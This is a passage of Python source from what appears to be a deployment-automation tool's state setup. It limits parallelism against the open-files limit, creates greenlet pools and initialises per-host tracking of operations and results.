        # If possible run everything in parallel, otherwise the max if defined above
        config.PARALLEL = (
            min(len(inventory), MAX_PARALLEL)
            if MAX_PARALLEL is not None
            else len(inventory)
        )

    # If explicitly set, just issue a warning
    elif MAX_PARALLEL is not None and config.PARALLEL > MAX_PARALLEL:
        logger.warning((
            'Parallel set to {0}, but this may hit the open files limit of {1}.\n'
            ' Max recommended value: {2}'
        ).format(config.PARALLEL, nofile_limit, MAX_PARALLEL))

    # Setup greenlet pools
    self.pool = Pool(config.PARALLEL)
    self.fact_pool = Pool(config.PARALLEL)

    # Assign inventory/config
    self.inventory = inventory
    self.config = config

    # Assign self to inventory & config
    inventory.state = config.state = self

    # Host tracking
    self.active_hosts = set()
    self.ready_hosts = set()
    self.connected_hosts = set()

    hostnames = [host.name for host in inventory]

    # Op basics
    self.op_order = []  # list of operation hashes
    self.op_meta = {}  # maps operation hash -> names/etc
    self.ops_run = set()  # list of ops which have been started/run

    # Op dict for each host
    self.ops = {hostname: {} for hostname in hostnames}

    # Meta dict for each host
    self.meta = {
        hostname: {
            'ops': 0,  # one function call in a deploy file
            'commands': 0,  # actual # of commands to run
            'latest_op_hash': None
        }
        for hostname in hostnames
    }

    # Results dict for each host
    self.results = {
        hostname: {
            'ops': 0,  # success_ops + failed ops w/ignore_errors
            'success_ops': 0,
            'error_ops': 0,
            'commands': 0
        }
        for hostname in hostnames
    }

    # Pipeline facts context manager attached to self
    self.pipeline_facts = PipelineFacts(self)